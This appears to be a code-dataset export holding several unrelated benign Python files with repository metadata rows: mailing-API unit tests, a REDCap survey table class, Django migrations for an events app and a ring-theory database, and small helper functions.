self.assertEquals(self.account.adapter.called, 1)
self.assertEquals(
self.account.adapter.call,
('GET', '/response/123/clicks', {'link_id': 1024}))
def test_can_get_forwards_list_for_mailing(self):
MockAdapter.expected = []
report = get_report(self.account, Report.ForwardList, 123)
self.assertIsInstance(report, list)
self.assertEquals(self.account.adapter.called, 1)
self.assertEquals(
self.account.adapter.call,
('GET', '/response/123/forwards', {}))
def test_can_get_optouts_list_for_mailing(self):
MockAdapter.expected = []
report = get_report(self.account, Report.OptOutList, 123)
self.assertIsInstance(report, list)
self.assertEquals(self.account.adapter.called, 1)
self.assertEquals(
self.account.adapter.call,
('GET', '/response/123/optouts', {}))
def test_can_get_signups_list_for_mailing(self):
MockAdapter.expected = []
report = get_report(self.account, Report.SignUpList, 123)
self.assertIsInstance(report, list)
self.assertEquals(self.account.adapter.called, 1)
self.assertEquals(
self.account.adapter.call,
('GET', '/response/123/signups', {}))
def test_can_get_shares_list_for_mailing(self):
MockAdapter.expected = []
report = get_report(self.account, Report.SharesList, 123)
self.assertIsInstance(report, list)
self.assertEquals(self.account.adapter.called, 1)
self.assertEquals(
self.account.adapter.call,
('GET', '/response/123/shares', {}))
def test_can_get_customer_shares_list_for_mailing(self):
MockAdapter.expected = []
report = get_report(self.account, Report.CustomerSharesList, 123)
self.assertIsInstance(report, list)
self.assertEquals(self.account.adapter.called, 1)
self.assertEquals(
self.account.adapter.call,
('GET', '/response/123/customer_shares', {}))
def test_can_get_customer_share_clicks_list_for_mailing(self):
MockAdapter.expected = []
report = get_report(self.account, Report.CustomerShareClicksList, 123)
self.assertIsInstance(report, list)
self.assertEquals(self.account.adapter.called, 1)
self.assertEquals(
self.account.adapter.call,
('GET', '/response/123/customer_share_clicks', {}))
def test_can_get_customer_share_for_mailing(self):
MockAdapter.expected = {}
report = get_report(self.account, Report.CustomerShare, 123)
self.assertIsInstance(report, dict)
self.assertEquals(self.account.adapter.called, 1)
self.assertEquals(
self.account.adapter.call,
('GET', '/response/123/customer_share', {}))
def test_can_get_shares_overview_for_mailing(self):
MockAdapter.expected = []
report = get_report(self.account, Report.SharesOverview, 123)
self.assertIsInstance(report, list)
self.assertEquals(self.account.adapter.called, 1)
self.assertEquals(
self.account.adapter.call,
('GET', '/response/123/shares/overview', {}))
| 41.950739
| 108
| 0.650305
| 922
| 8,516
| 5.829718
| 0.100868
| 0.133023
| 0.156279
| 0.210977
| 0.860837
| 0.845953
| 0.816186
| 0.789023
| 0.789023
| 0.789023
| 0
| 0.028171
| 0.228863
| 8,516
| 203
| 109
| 41.950739
| 0.790315
| 0
| 0
| 0.583333
| 0
| 0
| 0.075613
| 0.035224
| 0
| 0
| 0
| 0
| 0.35
| 1
| 0.122222
| false
| 0
| 0.027778
| 0
| 0.155556
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6bf0202b46cdf1703785ebd9b3fa3f9a2c682d96
| 8,210
|
py
|
Python
|
src/vbr/tableclasses/redcap/autogenerated/other_medical_surgical_treatments_ii.py
|
a2cps/python-vbr
|
9d5d4480386d0530450d59157e0da6937320f928
|
[
"BSD-3-Clause"
] | 1
|
2021-05-26T19:08:29.000Z
|
2021-05-26T19:08:29.000Z
|
src/vbr/tableclasses/redcap/autogenerated/other_medical_surgical_treatments_ii.py
|
a2cps/python-vbr
|
9d5d4480386d0530450d59157e0da6937320f928
|
[
"BSD-3-Clause"
] | 7
|
2021-05-04T13:12:39.000Z
|
2022-03-09T21:04:33.000Z
|
src/vbr/tableclasses/redcap/autogenerated/other_medical_surgical_treatments_ii.py
|
a2cps/python-vbr
|
9d5d4480386d0530450d59157e0da6937320f928
|
[
"BSD-3-Clause"
] | 2
|
2021-04-20T14:46:52.000Z
|
2021-06-07T20:28:28.000Z
|
"""Autogenerated 2021-11-16T11:37:36.434999 by redcap_classfiles.py
"""
from ....pgrest import *
from ...constants import Constants
from ..rcconstants import REDCapConstants
from ..rcaptable import RcapTable
__all__ = ["RcapOtherMedicalSurgicalTreatmentsIi"]
class RcapOtherMedicalSurgicalTreatmentsIi(RcapTable):
"""Other Medical Surgical Treatments Ii"""
__redcap_form_name = "other_medical_surgical_treatments_ii"
other_medical_surgical_treatments_ii_id = Constants.SERIAL_PRIMARY_KEY_COLUMN
other_medical_surgical_treatments_ii_complete = Column(
Integer, ForeignKey("status.status_id")
)
# Ignored multiline Field Name in Data Dictionary
# Field Type: text
# Choices: N/A
oms1timeframe = Column(String, nullable=True, comments=None)
# Did you receive any Chemotherapy / Immunotherapy for cancer i...
# Field Type: radio
# Choices: 1, Yes | 0, No
oms1chemoyn = Column(Boolean, nullable=True, comments=None)
# Did you receive any Radiation Therapy for cancer in the past ...
# Field Type: radio
# Choices: 1, Yes | 0, No
oms1radtxyn = Column(Boolean, nullable=True, comments=None)
# In the past [oms1timeframe], have you had any additional sign...
# Field Type: radio
# Choices: 1, Yes | 0, No
oms1surgyn = Column(Boolean, nullable=True, comments=None)
# 3.1 Related to my original knee surgery
# Field Type: radio
# Choices: 1, Yes | 0, No
oms1surgrel = Column(Boolean, nullable=True, comments=None)
#
# Field Type: checkbox
# Choices: 1, Knee manipulation
oms1relmanipultn = Column(Boolean, nullable=True, comments=None)
#
# Field Type: checkbox
# Choices: 1, Infection at surgical site
oms1relinfection = Column(Boolean, nullable=True, comments=None)
#
# Field Type: checkbox
# Choices: 1, Revision of knee replacement
oms1relrevision = Column(Boolean, nullable=True, comments=None)
#
# Field Type: checkbox
# Choices: 1, Other
oms1relother = Column(Boolean, nullable=True, comments=None)
# Other specify
# Field Type: text
# Choices: N/A
oms1relothertxt = Column(String, nullable=True, comments=None)
# 3.2 Unrelated to my original knee surgery
# Field Type: radio
# Choices: 1, Yes | 0, No
oms1surgunr = Column(Boolean, nullable=True, comments=None)
# Choose all that apply
# Field Type: checkbox
# Choices: 1, Surgery on the other knee
oms1unrotherknee = Column(Boolean, nullable=True, comments=None)
#
# Field Type: checkbox
# Choices: 1, Surgery on another region
oms1unrsurgother = Column(Boolean, nullable=True, comments=None)
#
# Field Type: checkbox
# Choices: 1, Other
oms1unrother = Column(Boolean, nullable=True, comments=None)
# Other specify
# Field Type: text
# Choices: N/A
oms1unrothertxt = Column(String, nullable=True, comments=None)
# In the past [oms1timeframe], have you had any non-scheduled v...
# Field Type: radio
# Choices: 1, Yes | 0, No
oms1visityn = Column(Boolean, nullable=True, comments=None)
# 4.1. Related to my original knee surgery
# Field Type: radio
# Choices: 1, Yes | 0, No
oms1relvisit = Column(Boolean, nullable=True, comments=None)
# Choose all that apply
# Field Type: checkbox
# Choices: 1, Emergency room / Urgent care clinic visit
oms1relvisited = Column(Boolean, nullable=True, comments=None)
#
# Field Type: checkbox
# Choices: 1, Physician office visit
oms1relvisitoffice = Column(Boolean, nullable=True, comments=None)
#
# Field Type: checkbox
# Choices: 1, Other
oms1relvisitother = Column(Boolean, nullable=True, comments=None)
# Other specify
# Field Type: text
# Choices: N/A
oms1relvisitothertxt = Column(String, nullable=True, comments=None)
# 4.2 Unrelated to my original knee surgery
# Field Type: radio
# Choices: 1, Yes | 0, No
oms1unrvisit = Column(Boolean, nullable=True, comments=None)
# Choose all that apply
# Field Type: checkbox
# Choices: 1, Emergency room / Urgent care clinic visit
oms1unrvisited = Column(Boolean, nullable=True, comments=None)
#
# Field Type: checkbox
# Choices: 1, Physician office visit
oms1unrvisitoffice = Column(Boolean, nullable=True, comments=None)
#
# Field Type: checkbox
# Choices: 1, Other
oms1unrvisitother = Column(Boolean, nullable=True, comments=None)
# Other specify
# Field Type: text
# Choices: N/A
oms1unrvisitothertxt = Column(String, nullable=True, comments=None)
# Ignored multiline Field Name in Data Dictionary
# Field Type: text
# Choices: N/A
oms2timeframe = Column(String, nullable=True, comments=None)
# Did you receive any Chemotherapy / Immunotherapy for cancer i...
# Field Type: radio
# Choices: 1, Yes | 0, No
oms2chemoyn = Column(Boolean, nullable=True, comments=None)
# Field Name was empty in Data Dictionary
# Field Type: checkbox
# Choices: 1, a. For the cancer associated with your thoracic surgery
oms2chemosame = Column(Boolean, nullable=True, comments=None)
# Field Name was empty in Data Dictionary
# Field Type: checkbox
# Choices: 1, b. For a different cancer
oms2chemodiff = Column(Boolean, nullable=True, comments=None)
# Did you receive any Radiation Therapy for cancer in the past ...
# Field Type: radio
# Choices: 1, Yes | 0, No
oms2radtxyn = Column(Boolean, nullable=True, comments=None)
# Field Name was empty in Data Dictionary
# Field Type: checkbox
# Choices: 1, a. For the cancer associated with your thoracic surgery
oms2radtxsame = Column(Boolean, nullable=True, comments=None)
# Field Name was empty in Data Dictionary
# Field Type: checkbox
# Choices: 1, b. For a different cancer
oms2radtxdiff = Column(Boolean, nullable=True, comments=None)
# In the past [oms2timeframe], have you had any additional sign...
# Field Type: radio
# Choices: 1, Yes | 0, No
oms2surgyn = Column(Boolean, nullable=True, comments=None)
# 3.1 Yes, related to my original chest surgery
# Field Type: radio
# Choices: 1, Yes | 0, No
oms2surgrel = Column(Boolean, nullable=True, comments=None)
# 3.2 Yes, but unrelated to my original chest surgery
# Field Type: radio
# Choices: 1, Yes | 0, No
oms2surgunr = Column(Boolean, nullable=True, comments=None)
# In the past [oms2timeframe], have you had any non-scheduled v...
# Field Type: radio
# Choices: 1, Yes | 0, No
oms2visityn = Column(Boolean, nullable=True, comments=None)
# 4.1. Yes, related to my original chest surgery
# Field Type: radio
# Choices: 1, Yes | 0, No
oms2relvisit = Column(Boolean, nullable=True, comments=None)
# Choose all that apply
# Field Type: checkbox
# Choices: 1, Emergency room / Urgent care clinic visit
oms2relvisited = Column(Boolean, nullable=True, comments=None)
#
# Field Type: checkbox
# Choices: 1, Physician office visit
oms2relvisitoffice = Column(Boolean, nullable=True, comments=None)
#
# Field Type: checkbox
# Choices: 1, Other
oms2relvisitother = Column(Boolean, nullable=True, comments=None)
# Other specify
# Field Type: text
# Choices: N/A
oms2relvisitothertxt = Column(String, nullable=True, comments=None)
# 4.2 Yes, but unrelated to my original chest surgery
# Field Type: radio
# Choices: 1, Yes | 0, No
oms2unrvisit = Column(Boolean, nullable=True, comments=None)
# Choose all that apply
# Field Type: checkbox
# Choices: 1, Emergency room / Urgent care clinic visit
oms2unrvisited = Column(Boolean, nullable=True, comments=None)
#
# Field Type: checkbox
# Choices: 1, Physician office visit
oms2unrvisitoffice = Column(Boolean, nullable=True, comments=None)
#
# Field Type: checkbox
# Choices: 1, Other
oms2unrvisitother = Column(Boolean, nullable=True, comments=None)
# Other specify
# Field Type: text
# Choices: N/A
oms2unrvisitothertxt = Column(String, nullable=True, comments=None)
| 39.282297
| 81
| 0.68648
| 1,002
| 8,210
| 5.597804
| 0.168663
| 0.075415
| 0.167588
| 0.201105
| 0.804421
| 0.781601
| 0.760029
| 0.750045
| 0.709752
| 0.707434
| 0
| 0.022212
| 0.221315
| 8,210
| 208
| 82
| 39.471154
| 0.855154
| 0.449574
| 0
| 0
| 1
| 0
| 0.020151
| 0.016487
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.068966
| 0
| 0.948276
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
6bffcc394be813a4e3004c1e308d8bdd079edcc9
| 81
|
py
|
Python
|
assign_stmt.py
|
duduscript/pl0-compiler-ply-
|
75a70fae38ab0fd5393f69518a2736b4365173ab
|
[
"MIT"
] | 7
|
2017-11-10T14:49:57.000Z
|
2021-07-20T12:34:32.000Z
|
assign_stmt.py
|
duduscript/pl0
|
75a70fae38ab0fd5393f69518a2736b4365173ab
|
[
"MIT"
] | null | null | null |
assign_stmt.py
|
duduscript/pl0
|
75a70fae38ab0fd5393f69518a2736b4365173ab
|
[
"MIT"
] | 2
|
2018-11-20T23:50:38.000Z
|
2021-11-14T19:23:57.000Z
|
def assign_left(ast):
return ast[1]
def assign_right(ast):
return ast[2]
| 16.2
| 22
| 0.679012
| 14
| 81
| 3.785714
| 0.571429
| 0.339623
| 0.45283
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.030769
| 0.197531
| 81
| 5
| 23
| 16.2
| 0.784615
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
d441d7f6b4f4d6775cd63bc26dea6491020be7aa
| 11,943
|
py
|
Python
|
Events/migrations/0008_auto_20181019_0242.py
|
prkhrv/Ebullience-2k18
|
0799a81239d1c1b1b6f8d49eb733f44fc22ff237
|
[
"MIT"
] | null | null | null |
Events/migrations/0008_auto_20181019_0242.py
|
prkhrv/Ebullience-2k18
|
0799a81239d1c1b1b6f8d49eb733f44fc22ff237
|
[
"MIT"
] | null | null | null |
Events/migrations/0008_auto_20181019_0242.py
|
prkhrv/Ebullience-2k18
|
0799a81239d1c1b1b6f8d49eb733f44fc22ff237
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.1.1 on 2018-10-18 21:12
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('Events', '0007_auto_20181019_0045'),
]
operations = [
migrations.RemoveField(
model_name='justaminute',
name='member_1',
),
migrations.RemoveField(
model_name='justaminute',
name='number_of_members',
),
migrations.RemoveField(
model_name='justaminute',
name='team_name',
),
migrations.RemoveField(
model_name='posterandpresentation',
name='member_1',
),
migrations.RemoveField(
model_name='posterandpresentation',
name='number_of_members',
),
migrations.RemoveField(
model_name='posterandpresentation',
name='team_name',
),
migrations.RemoveField(
model_name='postermaking',
name='member_3',
),
migrations.RemoveField(
model_name='postermaking',
name='member_4',
),
migrations.AlterField(
model_name='codewar',
name='event_id',
field=models.CharField(default='CSE01', max_length=5),
),
migrations.AlterField(
model_name='codewar',
name='event_name',
field=models.CharField(default='CODE WAR', max_length=20),
),
migrations.AlterField(
model_name='codewar',
name='member_1',
field=models.CharField(blank=True, default='', max_length=20),
),
migrations.AlterField(
model_name='codewar',
name='member_2',
field=models.CharField(blank=True, default='', max_length=20),
),
migrations.AlterField(
model_name='cosmetic',
name='event_id',
field=models.CharField(default='Bph02', max_length=5),
),
migrations.AlterField(
model_name='cosmetic',
name='event_name',
field=models.CharField(default='COSMETICS', max_length=20),
),
migrations.AlterField(
model_name='guessthebond',
name='event_id',
field=models.CharField(default='CIV01', max_length=5),
),
migrations.AlterField(
model_name='guessthebond',
name='event_name',
field=models.CharField(default='GUESS THE BOND?', max_length=30),
),
migrations.AlterField(
model_name='guessthebond',
name='member_1',
field=models.CharField(blank=True, default='', max_length=20),
),
migrations.AlterField(
model_name='guessthebond',
name='member_2',
field=models.CharField(blank=True, default='', max_length=20),
),
migrations.AlterField(
model_name='industrialcasestudy',
name='event_id',
field=models.CharField(default='CH01', max_length=5),
),
migrations.AlterField(
model_name='industrialcasestudy',
name='event_name',
field=models.CharField(default='INDUSTRIAL CASE STUDY', max_length=30),
),
migrations.AlterField(
model_name='industrialcasestudy',
name='member_1',
field=models.CharField(blank=True, default='', max_length=20),
),
migrations.AlterField(
model_name='industrialcasestudy',
name='member_2',
field=models.CharField(blank=True, default='', max_length=20),
),
migrations.AlterField(
model_name='justaminute',
name='event_id',
field=models.CharField(default='BT01', max_length=5),
),
migrations.AlterField(
model_name='justaminute',
name='event_name',
field=models.CharField(default='JUST A MINUTE', max_length=20),
),
migrations.AlterField(
model_name='karyaniti',
name='event_id',
field=models.CharField(default='MBA01', max_length=5),
),
migrations.AlterField(
model_name='karyaniti',
name='event_name',
field=models.CharField(default='KARYANITI', max_length=20),
),
migrations.AlterField(
model_name='karyaniti',
name='member_1',
field=models.CharField(blank=True, default='', max_length=20),
),
migrations.AlterField(
model_name='karyaniti',
name='member_2',
field=models.CharField(blank=True, default='', max_length=20),
),
migrations.AlterField(
model_name='karyaniti',
name='member_3',
field=models.CharField(blank=True, default='', max_length=20),
),
migrations.AlterField(
model_name='karyaniti',
name='member_4',
field=models.CharField(blank=True, default='', max_length=20),
),
migrations.AlterField(
model_name='mindfizz',
name='event_id',
field=models.CharField(default='ECE01', max_length=5),
),
migrations.AlterField(
model_name='mindfizz',
name='event_name',
field=models.CharField(default='MIND FIZZ', max_length=20),
),
migrations.AlterField(
model_name='mindfizz',
name='member_1',
field=models.CharField(blank=True, default='', max_length=20),
),
migrations.AlterField(
model_name='mindfizz',
name='member_2',
field=models.CharField(blank=True, default='', max_length=20),
),
migrations.AlterField(
model_name='mindfizz',
name='member_3',
field=models.CharField(blank=True, default='', max_length=20),
),
migrations.AlterField(
model_name='mindfizz',
name='member_4',
field=models.CharField(blank=True, default='', max_length=20),
),
migrations.AlterField(
model_name='posterandpresentation',
name='event_id',
field=models.CharField(default='MCA02', max_length=5),
),
migrations.AlterField(
model_name='posterandpresentation',
name='event_name',
field=models.CharField(default='POSTER & PRESENTATIONS', max_length=40),
),
migrations.AlterField(
model_name='postermaking',
name='event_id',
field=models.CharField(default='Bph01', max_length=5),
),
migrations.AlterField(
model_name='postermaking',
name='event_name',
field=models.CharField(default='POSTER MAKING', max_length=20),
),
migrations.AlterField(
model_name='postermaking',
name='member_1',
field=models.CharField(blank=True, default='', max_length=20),
),
migrations.AlterField(
model_name='postermaking',
name='member_2',
field=models.CharField(blank=True, default='', max_length=20),
),
migrations.AlterField(
model_name='roborace',
name='event_id',
field=models.CharField(default='EN01', max_length=5),
),
migrations.AlterField(
model_name='roborace',
name='event_name',
field=models.CharField(default='ROBO RACE', max_length=20),
),
migrations.AlterField(
model_name='roborace',
name='member_1',
field=models.CharField(blank=True, default='', max_length=20),
),
migrations.AlterField(
model_name='roborace',
name='member_2',
field=models.CharField(blank=True, default='', max_length=20),
),
migrations.AlterField(
model_name='roborace',
name='member_3',
field=models.CharField(blank=True, default='', max_length=20),
),
migrations.AlterField(
model_name='roborace',
name='member_4',
field=models.CharField(blank=True, default='', max_length=20),
),
migrations.AlterField(
model_name='robosoccer',
name='event_id',
field=models.CharField(default='ME02', max_length=5),
),
migrations.AlterField(
model_name='robosoccer',
name='event_name',
field=models.CharField(default='ROBO SOCCER', max_length=20),
),
migrations.AlterField(
model_name='robosoccer',
name='member_1',
field=models.CharField(blank=True, default='', max_length=20),
),
migrations.AlterField(
model_name='robosoccer',
name='member_2',
field=models.CharField(blank=True, default='', max_length=20),
),
migrations.AlterField(
model_name='robosoccer',
name='member_3',
field=models.CharField(blank=True, default='', max_length=20),
),
migrations.AlterField(
model_name='robosoccer',
name='member_4',
field=models.CharField(blank=True, default='', max_length=20),
),
migrations.AlterField(
model_name='robosoccer',
name='number_of_members',
field=models.CharField(default='', max_length=10),
),
migrations.AlterField(
model_name='startupmaster',
name='event_id',
field=models.CharField(default='EN02', max_length=5),
),
migrations.AlterField(
model_name='startupmaster',
name='event_name',
field=models.CharField(default='START UP MASTER', max_length=30),
),
migrations.AlterField(
model_name='startupmaster',
name='member_1',
field=models.CharField(blank=True, default='', max_length=20),
),
migrations.AlterField(
model_name='startupmaster',
name='member_2',
field=models.CharField(blank=True, default='', max_length=20),
),
migrations.AlterField(
model_name='technicalquiz',
name='event_id',
field=models.CharField(default='MCA01', max_length=5),
),
migrations.AlterField(
model_name='technicalquiz',
name='event_name',
field=models.CharField(default='TECHNICAL QUIZ', max_length=20),
),
migrations.AlterField(
model_name='technicalquiz',
name='member_1',
field=models.CharField(blank=True, default='', max_length=20),
),
migrations.AlterField(
model_name='technicalquiz',
name='member_2',
field=models.CharField(blank=True, default='', max_length=20),
),
migrations.AlterField(
model_name='webdesigning',
name='event_id',
field=models.CharField(default='IT01', max_length=5),
),
migrations.AlterField(
model_name='webdesigning',
name='event_name',
field=models.CharField(default='WEB DESIGNING', max_length=20),
),
migrations.AlterField(
model_name='webdesigning',
name='member_1',
field=models.CharField(blank=True, default='', max_length=20),
),
migrations.AlterField(
model_name='webdesigning',
name='member_2',
field=models.CharField(blank=True, default='', max_length=20),
),
]
| 35.02346
| 84
| 0.551453
| 1,085
| 11,943
| 5.886636
| 0.095853
| 0.094411
| 0.230938
| 0.267888
| 0.934085
| 0.934085
| 0.914357
| 0.572256
| 0.52873
| 0.509786
| 0
| 0.024417
| 0.324458
| 11,943
| 340
| 85
| 35.126471
| 0.767229
| 0.003768
| 0
| 0.892216
| 1
| 0
| 0.137777
| 0.01076
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.002994
| 0
| 0.011976
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d47a714f450edb22c36e1f1df48a093a8a8b87c8
| 134
|
py
|
Python
|
src/match/match.py
|
ispmarin/text_norm
|
d080983a842dd303da59bfc19dd13aa43abe2961
|
[
"MIT"
] | 2
|
2019-01-29T07:49:05.000Z
|
2021-12-22T06:19:08.000Z
|
src/match/match.py
|
ispmarin/text_norm
|
d080983a842dd303da59bfc19dd13aa43abe2961
|
[
"MIT"
] | null | null | null |
src/match/match.py
|
ispmarin/text_norm
|
d080983a842dd303da59bfc19dd13aa43abe2961
|
[
"MIT"
] | 1
|
2022-02-07T14:36:06.000Z
|
2022-02-07T14:36:06.000Z
|
import jellyfish
def similarity(input_string_1, input_string_2):
return jellyfish.jaro_winkler(input_string_1, input_string_2)
| 19.142857
| 65
| 0.828358
| 20
| 134
| 5.1
| 0.55
| 0.431373
| 0.235294
| 0.333333
| 0.470588
| 0.470588
| 0
| 0
| 0
| 0
| 0
| 0.033613
| 0.11194
| 134
| 6
| 66
| 22.333333
| 0.823529
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 9
|
2e45cde18680c0403b46cc4fef659ac9a3c1ab89
| 10,342
|
py
|
Python
|
ringapp/migrations/0001_initial.py
|
rschwiebert/RingApp
|
35675b3dd81728d71b7dc70071be3185d7f99bf4
|
[
"MIT"
] | 10
|
2015-02-02T12:40:05.000Z
|
2022-01-29T14:11:03.000Z
|
ringapp/migrations/0001_initial.py
|
rschwiebert/RingApp
|
35675b3dd81728d71b7dc70071be3185d7f99bf4
|
[
"MIT"
] | 22
|
2015-01-07T21:29:24.000Z
|
2022-03-19T01:15:13.000Z
|
ringapp/migrations/0001_initial.py
|
rschwiebert/RingApp
|
35675b3dd81728d71b7dc70071be3185d7f99bf4
|
[
"MIT"
] | 1
|
2016-08-07T15:41:51.000Z
|
2016-08-07T15:41:51.000Z
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Citation',
fields=[
('id', models.AutoField(unique=True, serialize=False, primary_key=True)),
('location', models.CharField(max_length=50)),
('poster', models.CharField(max_length=30)),
('time', models.DateTimeField(auto_now_add=True)),
],
options={
'db_table': 'citations',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='CommEquivalents',
fields=[
('id', models.AutoField(unique=True, serialize=False, primary_key=True)),
('equivalent', models.CharField(max_length=500)),
('keywords', models.CharField(max_length=200)),
('source', models.CharField(max_length=100)),
('poster', models.CharField(max_length=30, null=True, blank=True)),
],
options={
'db_table': 'comm_equivalents',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='CommLogic',
fields=[
('logic_id', models.AutoField(unique=True, serialize=False, primary_key=True, db_column='logic_ID')),
('entry_type', models.IntegerField(null=True, blank=True)),
('cond_1', models.IntegerField(null=True, blank=True)),
('cond_2', models.IntegerField(null=True, blank=True)),
('cond_3', models.IntegerField(null=True, blank=True)),
('cond_4', models.IntegerField(null=True, blank=True)),
('conc', models.IntegerField(null=True, blank=True)),
('option', models.CharField(max_length=200, blank=True)),
('citation', models.CharField(max_length=200, blank=True)),
('poster', models.CharField(max_length=25, null=True, blank=True)),
('readable', models.CharField(max_length=120, null=True, blank=True)),
],
options={
'db_table': 'comm_logic',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='CommProperty',
fields=[
('property_id', models.AutoField(unique=True, serialize=False, primary_key=True, db_column='property_ID')),
('name', models.CharField(max_length=250)),
('definition', models.CharField(max_length=500)),
('poster', models.CharField(max_length=25, null=True, blank=True)),
],
options={
'db_table': 'comm_properties',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='CommRingProperty',
fields=[
('id', models.AutoField(unique=True, serialize=False, primary_key=True)),
('has_property', models.IntegerField(null=True, blank=True)),
('reason', models.CharField(max_length=200)),
('source', models.CharField(max_length=500)),
('poster', models.CharField(max_length=25, null=True, blank=True)),
('time', models.DateTimeField(auto_now_add=True)),
('property', models.ForeignKey(db_column='property_ID', blank=True, to='ringapp.CommProperty', null=True, on_delete=models.CASCADE)),
],
options={
'db_table': 'comm_ring_property',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Equivalents',
fields=[
('id', models.AutoField(unique=True, serialize=False, primary_key=True)),
('equivalent', models.CharField(max_length=500)),
('keywords', models.CharField(max_length=200)),
('source', models.CharField(max_length=100)),
('poster', models.CharField(max_length=30, null=True, blank=True)),
],
options={
'db_table': 'equivalents',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Logic',
fields=[
('logic_id', models.AutoField(unique=True, serialize=False, primary_key=True, db_column='logic_ID')),
('entry_type', models.IntegerField(null=True, blank=True)),
('cond_1', models.IntegerField(null=True, blank=True)),
('cond_2', models.IntegerField(null=True, blank=True)),
('cond_3', models.IntegerField(null=True, blank=True)),
('cond_4', models.IntegerField(null=True, blank=True)),
('conc', models.IntegerField(null=True, blank=True)),
('option', models.CharField(max_length=200, blank=True)),
('citation', models.CharField(max_length=200, null=True, blank=True)),
('poster', models.CharField(max_length=25, null=True, blank=True)),
('readable', models.CharField(max_length=120, null=True, blank=True)),
],
options={
'db_table': 'logic',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Property',
fields=[
('property_id', models.AutoField(unique=True, serialize=False, primary_key=True, db_column='property_ID')),
('name', models.CharField(max_length=250)),
('definition', models.CharField(max_length=500)),
('poster', models.CharField(max_length=25, null=True, blank=True)),
],
options={
'db_table': 'properties',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Publication',
fields=[
('id', models.AutoField(unique=True, serialize=False, primary_key=True)),
('title', models.CharField(max_length=100)),
('authors', models.CharField(max_length=50)),
('details', models.CharField(max_length=100, null=True, blank=True)),
('pub_date', models.DateField()),
('poster', models.CharField(max_length=30)),
('time', models.DateTimeField(auto_now_add=True)),
],
options={
'db_table': 'publications',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Ring',
fields=[
('ring_id', models.AutoField(unique=True, serialize=False, primary_key=True, db_column='ring_ID')),
('name', models.CharField(max_length=250)),
('description', models.CharField(max_length=1000)),
('keywords', models.CharField(max_length=200)),
('reference', models.CharField(max_length=500)),
('notes', models.CharField(max_length=500, null=True, blank=True)),
('poster', models.CharField(max_length=25, null=True, blank=True)),
],
options={
'db_table': 'rings',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='RingProperty',
fields=[
('id', models.AutoField(unique=True, serialize=False, primary_key=True)),
('has_property', models.IntegerField(null=True, blank=True)),
('reason', models.CharField(max_length=200)),
('source', models.CharField(max_length=500)),
('poster', models.CharField(max_length=25, null=True, blank=True)),
('time', models.DateTimeField(auto_now_add=True, null=True)),
('property', models.ForeignKey(db_column='property_ID', blank=True, to='ringapp.Property', null=True, on_delete=models.CASCADE)),
('ring', models.ForeignKey(db_column='ring_ID', blank=True, to='ringapp.Ring', null=True, on_delete=models.CASCADE)),
],
options={
'db_table': 'ring_property',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Theorem',
fields=[
('theorem_id', models.AutoField(unique=True, serialize=False, primary_key=True, db_column='theorem_id')),
('alias', models.CharField(max_length=100, null=True, blank=True)),
('statement', models.CharField(max_length=400)),
('link', models.URLField(null=True, blank=True)),
('poster', models.CharField(max_length=25, null=True, blank=True)),
('time', models.DateTimeField(auto_now_add=True)),
('reference', models.ManyToManyField(to='ringapp.Citation', verbose_name='theorem reference')),
],
options={
'db_table': 'theorems',
},
bases=(models.Model,),
),
migrations.AddField(
model_name='equivalents',
name='property',
field=models.ForeignKey(db_column='property_ID', blank=True, to='ringapp.Property', null=True, on_delete=models.CASCADE),
preserve_default=True,
),
migrations.AddField(
model_name='commringproperty',
name='ring',
field=models.ForeignKey(db_column='ring_ID', blank=True, to='ringapp.Ring', null=True, on_delete=models.CASCADE),
preserve_default=True,
),
